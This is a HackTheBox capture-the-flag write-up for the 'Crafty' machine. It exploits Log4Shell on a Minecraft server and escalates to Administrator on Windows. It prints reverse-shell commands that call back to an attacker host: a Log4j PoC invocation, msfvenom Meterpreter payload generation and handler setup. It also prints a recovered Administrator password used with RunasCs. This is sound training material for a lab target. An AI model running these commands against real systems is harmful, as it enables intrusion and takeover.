Crafty
Crafty writeup by Thamizhiniyan C S
Overview
Greetings everyone,
In this write-up, we will tackle Crafty from HackTheBox.
Machine link: Crafty Machine
Difficulty Level: Easy
Let's Begin 🙌
Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. Click Here to learn more about how to connect to VPN and access the boxes.
Once connected to the VPN service, click on "Join Machine" to access the machine's IP.
Upon joining the machine, you will be able to view the IP address of the target machine.
Reconnaissance
Nmap Port Scan
nmap -p- -T4 -Pn <TARGET_IP>

Nmap Intense Scan
nmap -A -p 80,25565 -v -Pn <TARGET_IP>

Results
80
HTTP
Microsoft-IIS httpd 10.0
25565
Minecraft
Minecraft 1.16.5
Information Gathering - crafty.htb
First, let's take a look at the website running on port 80.

When attempting to access view port 80, it redirects to the domain crafty.htb
. Therefore, to access the website, we need to append an entry to the /etc/hosts
file, mapping the domain to the target IP address.
Command: sudo vim /etc/hosts

Now we have access to the website. I used Wappalyzer
to check the technologies employed, but nothing of particular interest was discovered.

A subdomain, play.crafty.htb
, was mentioned on the website. To access it, append another entry to the /etc/hosts
file.

However, upon attempting to access it, it redirected back to crafty.htb
.

Subdomain Enumeration
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.crafty.htb/

VHOST Enumeration

Indeed, it seems that there wasn't anything noteworthy discovered on the website.
Information Gathering - Port 25565
CVE-2021-44228
Next, I began the process of enumerating the Minecraft server running on port 25565. I conducted a Google search to identify potential vulnerabilities and exploits specifically targeting Minecraft server version 1.16.5. Here's what I found:
CVE-2021-44228 is a security vulnerability in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability, also known as Log4Shell, allows attackers to execute malicious code remotely by exploiting a flaw in the library's JNDI (Java Naming and Directory Interface) lookup mechanism.
Based on the information provided in the article, it appears evident that the Minecraft Server running on the target is vulnerable to CVE-2021-44228, as it utilizes the Log4j library.
Next, I proceeded to search for exploits and proofs of concept (PoCs) for this vulnerability and came across the following:
Initial Access
Understanding the Attack
The script provided in the repository sets up an HTTP server and an LDAP server for you. Additionally, it generates a payload that you can insert into the Minecraft game or client.
When you paste the crafted payload into the Minecraft client, it connects back to the HTTP server hosted by the script. This server then references the exploit hosted by the LDAP server within the script. Upon successful execution of the exploit, a reverse shell is established, connecting back to a listener on your attacker machine. This process allows you to gain control over the target system.
Setting up the Environment
I cloned the above mentioned repository using Git.

To set up the environment for the exploit to run, I first created a virtual environment using Python. Then, I installed the necessary dependencies mentioned in the requirements.txt
file.
python3 -m venv venv
source ./venv/bin/activate

Next, it's time to install the dependencies.

To obtain the required Java SDK version as specified in the readme file of the repository, please follow the instructions provided in the repository's README file: Getting the Java Version.
Extract the downloaded file.

Check whether you have installed the SDK correctly, by veryfing its version.

Now, rename the sdk folder as mentioned in the repository.

While examining the poc.py
file to determine the required arguments for running the exploit, I noticed a variable named cmd with the value "/bin/bash
" specified on line 26. It appears that the exploit was designed for a Linux target. However, since our target is a Windows machine (running Microsoft IIS server), we should modify the value to "cmd.exe
" in order to obtain the shell.

We have successfully set up the environment for the exploit to run.
Setting up PyCraft
We require either the Minecraft game itself or a Minecraft client to connect to the Minecraft server running on the target. For this purpose, I've decided to utilize PyCraft, a Minecraft Python Client Library.
First clone the repository.

Next install the dependencies.

We have successfully set up PyCraft.
Setting up a Netcat Listener
Since the exploit establishes a reverse shell back to our host, we need to set up a netcat listener on our attacking machine to receive the reverse shell. We will configure the netcat listener to listen on port 9001.

Performing the Attack
First let's start the HTTP and LDAP server.
python3 poc.py --userip <HTB_TUN_IP/Attacker_IP> --webport 25565 --lport 9001

The highlighted text depicted in the image above represents the crafted payload.
Next, connect to the Minecraft server using PyCraft. Enter a random username, leave the password field empty, and input the IP address of the target machine in the Server host field. Then, paste the payload and press enter once connected to the server.

Now, check the HTTP server hosted by the poc.py
script. You'll notice that we have received a request from the Minecraft server, and the script has referred to the exploit accordingly.

Now, check the netcat listener. You'll observe that the reverse shell has successfully connected to the listener, and you can see the command prompt from the target machine. This indicates that we have successfully executed the attack and gained access to the target machine.

Getting the User Flag
I found the user.txt
file located at C:\Users\svc_minecraft\Desktop
directory.

Privilege Escalation
Finding the First Loop Hole
As I was navigating through the directories on the target machine, I found that there was nothing noteworthy in the logs folder and other files. However, I came across a suspicious file named playercounter-1.0-SNAPSHOT.jar
in the C:\Users\svc_minecraft\plugins\
directory.
To examine that file, we need to download it to our attacker machine. Initially, I attempted to start an HTTP server from the target machine, but the firewall blocked it, and we don't have the necessary permissions to override it. Therefore, I opted to use Meterpreter to download the file instead.
Generating the First Meterpreter Reverse Shell using msfvenom
To create a Meterpreter reverse shell using msfvenom, we first need to select a payload. To do this, we must determine the target machine's architecture. We can retrieve the processor architecture by executing the command "echo %PROCESSOR_ARCHITECTURE%
" in the command prompt.

Now we know that the target machine's architecture is x64, it's time to generate the reverse shell using msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<HTB_TUN_IP/Attacker_IP> LPORT=4444 -f exe >> rev.exe

We have successfully created the reverse shell.
Setting up msfconsole
To set up a listener for the reverse shell to connect back, open msfconsole and enter the following commands:
use exploit/multi/handler
set lhost <HTB_TUN_IP/Attacker_IP>
set payload windows/x64/meterpreter/reverse_tcp

Now its time to start the listener.

Sending the First Reverse Shell to Target
Let's create a simple http python server to transfer the reverse shell from out attacker machine to the target machine.

While in the shell of the target machine, switch to PowerShell using the command "powershell
", then type the following command to download the reverse shell.

You can see that we have successfully transferred the reverse shell to the target machine.

Executing the Reverse Shell
Now its time to execute the reverse shell.

Check the listener in msfconsole. You can see the meterpreter session.

Now switch the plugins directory.

Use the download
command to download the jar file from the target machine.
download C:\\users\\svc_minecraft\\server\\plugins\\playercounter-1.0-SNAPSHOT.jar

Now we have successfully downloaded the file to our attacker machine.
Finding the Second Loop Hole
To view the contents of the JAR file, we require a Java decompiler. Jadx-GUI is one of the recommended decompilers available.
Clone the mentioned repository.

Now build the JADX-GUI tool.

After the build process is complete, navigate to the build/jadx/bin
directory and run the JADX-GUI application.

Now open the jar file.

After inspecting the contents and code of the JAR file, I came across a string that appears to resemble a password.

The password we found might be the Administrator's password.
Finding a Way to Break Through
Since we've obtained the Administrator's password (albeit through a guess), we can attempt to escalate our privileges using common Windows privilege escalation techniques. One such method involves utilizing the built-in runas
command in Windows, which is somewhat equivalent to the sudo
command in Linux, allowing us to run processes with elevated privileges.
To know more:
In this scenario, I will utilize the RunasCs tool, an improved version of the default Windows runas.exe program.
You can download the latest version of RunasCs from here: https://github.com/antonioCoco/RunasCs/releases
Our objective is to leverage the RunasCs tool to execute a reverse shell as Administrator, utilizing the password we discovered.
Generating the Second Reverse Shell
We can employ the same reverse shell that we've previously uploaded to the target machine. However, I've created a new reverse shell on a different port to ensure that the previous session remains undisturbed for backup.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<HTB_TUN_IP/Attacker_IP> LPORT=4445 -f exe >> rev2.exe

Setting up the Second Listener
Now, set up the second listener in another terminal within msfconsole.

Uploading the RunasCs.exe and the Second Reverse Shell
Now, it's time to upload the RunasCs.exe and the second reverse shell to the target machine using the previously obtained Meterpreter shell.

Executing the Second Reverse Shell with Elevated Privileges
Type the command "shell
" to open the command prompt from the Meterpreter session, then execute the RunasCs.exe application to run the reverse shell with elevated privileges.
.\RunasCs.exe Administrator s67u84zKq8IXw rev2.exe

Now, check the second Meterpreter session for the reverse shell with elevated privileges.

Getting the Root Flag
You can get the root flag at C:\Users\Administrator\Desktop
directory.

We have successfully obtained the user and root flag.
Thank You.....
Last updated
Was this helpful?